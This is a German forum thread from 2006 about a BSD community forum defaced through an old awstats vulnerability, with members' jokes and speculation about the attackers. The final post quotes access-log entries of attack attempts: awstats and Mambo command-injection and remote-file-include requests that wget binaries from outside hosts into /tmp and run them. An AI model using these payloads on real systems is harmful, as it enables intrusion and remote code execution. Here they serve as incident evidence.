Ubuntu War Crew....

saintjoe

Bodybuilder
Naja,

was solls - Ubuntu war crew - ich kenn die nicht, wahrscheinlich auch kein anderer.

Aber die Ubuntus haben heute nacht den Server "infiltriert". Ich habe es zwar recht schnell bemerkt, aber ein paar Daten sind wohl doch verschütt gegangen. Diese "war crew" hat es speziell auf die exektuive Abgesehen, und vornehmlich den Benutzerstatus von Moderatoren geändert.
Nun gut, sei's drum. Backups könnte ich wieder herstellen, aber neues "Blut" tut dem Forum sicherlich auch gut. Daher sind sämtliche Mod-Posten wieder frei. Alte Mods sind von der Teilnahme natürlich nicht ausgeschlossen.

Bewerbungen gehen derzeit noch an kith, asg und saintjoe.

Gruß
 

Anhänge

  • Bild 2.png
    Bild 2.png
    26,8 KB · Aufrufe: 821
Die sind doch einfach zu l33t für uns, die h4x0r, oder? :ugly:
EDIT: Da fällt mir auf: Wir bräuchten ein Forensystem in der Standardinstallation von OpenBSD *g*
 
Ich finde, bei dieser Geschichte gibt es nichts auf die leichte Schulter zu nehmen. Über den Hintergrund kann man ja nur spekulieren, aber sollte es wirklich so sein, dass Anhänger eines OS(S) hier die Community eines anderen attakieren, dann ist das ärmlich und beschämend.
 
Steve schrieb:
Ich finde, bei dieser Geschichte gibt es nichts auf die leichte Schulter zu nehmen. Über den Hintergrund kann man ja nur spekulieren, aber sollte es wirklich so sein, dass Anhänger eines OS(S) hier die Community eines anderen attakieren, dann ist das ärmlich und beschämend.
Tja, die Welt ist schlecht. Früher im Krieg Amiga gegen Atari gegen Dosen gegen C64 hat man sich wenigstens noch gepflegt geprügelt, aber heute ...

Sinnlos darüber zu diskutieren, Sicherheitslücke schliessen und weiter gehts.

Athaba schrieb:
EDIT: Da fällt mir auf: Wir bräuchten ein Forensystem in der Standardinstallation von OpenBSD *g*
Schlag das mal auf misc@ vor, das ist 'nen Flame wert. :D
 
Steve` schrieb:
Ich finde, bei dieser Geschichte gibt es nichts auf die leichte Schulter zu nehmen. Über den Hintergrund kann man ja nur spekulieren, aber sollte es wirklich so sein, dass Anhänger eines OS(S) hier die Community eines anderen attakieren, dann ist das ärmlich und beschämend.

ACK! Sagt ma, sind die bescheuert?! Ne dezente Anfrage in der Ubuntu Ecke wird hier auch kaum Erfolg zeigen. Ich kann mir nur schwerlich vorstellen, dass sich diese UWC öffentlich irgendwo präsentiert. Google schwieg sich heute morgen auch drüber aus.
 
Wenn man schon ein Betriebssystem mit Zulu Namen verwendet, muss man auch gleich zum afrikanischen Warlord mutieren?

Gegen eine gehackte Seite sagt ja normal niemand was: Man könnte das aber mit Stil tun. Das Bild sieht so aus, als ob ein SK einen Exploid gefunden hat und es jetzt an den seiten ausprobiert für die er nicht helle genug ist.
 
Zuletzt bearbeitet:
Wie kreativ...

Wahrscheinlich hat Metasploit nicht genug "klickbare" Optionen bereitgestellt. Eine schöne Grafik oder ein wenig BSD-Flame hätten schon drin sein müssen.
 
Naja also ich würde mal sagen, dass sich da einer ganz toll findet und unbedingt zeigen will was für dicke Ei.. er hat. :S
Solche Menschen sind schon erbärmlich.

Wäre aber trotzdem von Nutzen herauszufinden, wie sie sich ins Sys einhehackt haben.
 
Na ganz so humorvoll sehe ich das nicht. Ich glaube auch nicht das "ubuntu" dahinter steht. Mir stellt sich einzig und allein die Frage, wie kann es sein, das auf einem hoffentlich "aktuellem" System sowas passieren kann. Diverse Sicherheitslücken in PHP sind seit kurzem bekannt und über die Ports aquch schon längst geschlossen worden. Oder hatte das Board eine Lücke? Weis davon der Hersteller?
 
Die erste Frage waere doch nun wohl sicherlich, wie exakt sich der Einbruch vollzogen hat. Sonst ist die Bude morgen wieder auf. Sind die Passworte irgendwo im Klartext hinterlegt auf dem Server?

Wenn ich einen Tipp abgeben sollte: Retourkutsche von irgendwem, der hier und/oder im IRC mitliest.
 
Zuletzt bearbeitet:
Das Forum hier sieht wie ein VBulletin aus. Ich habe auch mal eins betrieben und mir seinerzeit den Quellcode angesehen. Ich muss sagen, das Ding ist einfach schlecht programmiert. Das wimmelt wahrscheinlich genauso von Lücken wie PHPbb.
 
wir können(?) ja auch jetzt alle einfach www.ubuntuusers.de kaputt machen, aber wie nennen wir uns dann?
bsdforen war crew wär ein bisschen auffällig....
andererseits könnte wir auch unsere mitglieder auspionieren, irgendjemand muss wohl rumerzält haben, dass hier ein paar leute ubuntu nicht mögen...
oder noch besser, saintjoe oder dann unser neuer admin, sollte ne ordentliche firewall auf den server packen die connections nur von nicht-ubuntu rechnern erlaubt - ach was gleich die ganzen linuxe ausperren! benutzen doch eh nur lamer (und die ubuntu war crew)
 
*g* Firewall, guter Vorschlag. Lasst aber Windows weiterhin zu. Das wird uns ni gefährlich und ansonsten wäre es doch hier auf Arbeit so langweilig, wenn man ni hin und wieder mal hier rein schauen könnte. ;)
 
SierraX schrieb:
Wo bleibt dann das Kamikaze-BB unter BSD-Lizenz ;)
Lach nicht, aber ich arbeite daran. Im Moment kämpfe ich schwer mit der Abstraktion der Datenbanken, da ich PostgreSQL bevorzuge aber auch MySQL unterstützen will.

Ich habe mir für das PHP Probrammieren Regeln aufgestellt an die ich mich stoisch halte, die die Sicherheit garantieren sollen. Wenn ich eine Version habe, die halbwegs ausgereift ist, werde ich den Code unter BSD-Lizens veröffentlichen.
 
Moin moin,

dsa ganze ist durch eine altbekannte Lücke in awstats passiert. Ich hab awstats zwar durch .htaccess geschützt, aber anscheinend nicht in ausreichend sicherem Maße.

die "H4x0r" waren so "nett", nichts großartig zu verändern. Es wurden lediglich ein-zwei SQL Queries ausgeführt und ein Verzeichnis verschoben. Dennoch werde ich die betroffene Jail heute nacht neu aufsetzen, damit sollten wir dann auf Nummer sicher gehen. Nach wirklichen "Cracks" sah mir der ganze Angriff allerdings nicht wirklich aus ;)

Gruß
 
Deiner Aussage nach ist es das was auch euf meinem Server versucht wurde da ich aber kein Forum betreibe schterte es schon im Ansatz. Das einzige was ich auf PHP-basis auf meinen Server betrieben habe war phpsysteminfo mehr nicht und auf basis von perl hatte ich eigene scripte laufen. So sah es dann bei mir im httpd-access.log aus.

Das als cgi-geschichte!
Code:
210.22.175.130 - - [16/Mar/2006:12:18:02 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20131%2e220%2e92%2e80%2fcacat%3bchmod%20%2bx%20cacat%3b%2e%2fcacat%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 334 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
210.22.175.130 - - [16/Mar/2006:12:18:03 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20131%2e220%2e92%2e80%2fcacat%3bchmod%20%2bx%20cacat%3b%2e%2fcacat%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 334 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
210.22.175.130 - - [16/Mar/2006:12:18:05 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20131%2e220%2e92%2e80%2fcacat%3bchmod%20%2bx%20cacat%3b%2e%2fcacat%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 342 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

Hier noch ein paar Beispiele auf php.

Code:
66.135.40.97 - - [16/Mar/2006:23:07:35 +0100] "GET /index.php?option=com_content&do_pdf=1&id=1index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://83.16.187.6/cmd.gif?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo|  HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
66.135.40.97 - - [16/Mar/2006:23:07:37 +0100] "GET /mambo/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://83.16.187.6/cmd.gif?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo|  HTTP/1.1" 404 331 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
66.135.40.97 - - [16/Mar/2006:23:07:38 +0100] "GET /cvs/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://83.16.187.6/cmd.gif?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo|  HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

Ich habe von jedem nur mal 3 Beispiele rausgegriffen es waren aber so im ganzen etwas über 30 Angriffe.

Gruß Carsten
 
Zurück
Oben